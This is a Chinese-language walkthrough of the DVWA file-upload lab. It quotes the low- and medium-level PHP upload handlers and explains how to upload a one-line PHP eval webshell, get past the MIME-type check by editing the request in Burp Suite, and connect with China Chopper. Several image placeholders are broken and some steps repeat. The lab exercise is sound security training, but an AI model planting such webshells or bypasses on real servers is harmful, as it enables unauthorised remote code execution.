文件上传
低等级
```
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
?>
```
这是低级的源代码
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path))
从这一段可以看出筛选条件,只要上传了文件就可以成功
<?php @eval($_POST['1']);?>
用这一段写进.php文件,上传就可以成功
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yLv9DhTk-1587954899992)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427101730462.png)]
然后访问该路径,去掉#号,加上…/…/hackable/uploads/yijuhua.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2JIuxOcf-1587954899996)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427101922374.png)]
得到地址,用中国菜刀连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TwINZ7a9-1587954899998)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427102125823.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5nvfOxYn-1587954900001)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427102233248.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uiqGYRhG-1587954900006)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427102246960.png)]
连上成功后就可以获得webshell
中等级
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>
这是中级源代码
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))
可以看出这是条件
条件为memi类型为"image/jpeg"并且文件大小小于100000字节
我们可以使用burpsuit拦截代理,修改请求报文
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y57022fx-1587954900008)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427103005924.png)]
我们将它改为"image/jpeg",然后放行
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yBa268NZ-1587954900009)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427103156346.png)]
成功了,连接菜刀
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MePIu9Qn-1587954900010)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427103346832.png)]
为"image/jpeg",然后放行
[外链图片转存中…(img-yBa268NZ-1587954900009)]
成功了,连接菜刀
[外链图片转存中…(img-MePIu9Qn-1587954900010)]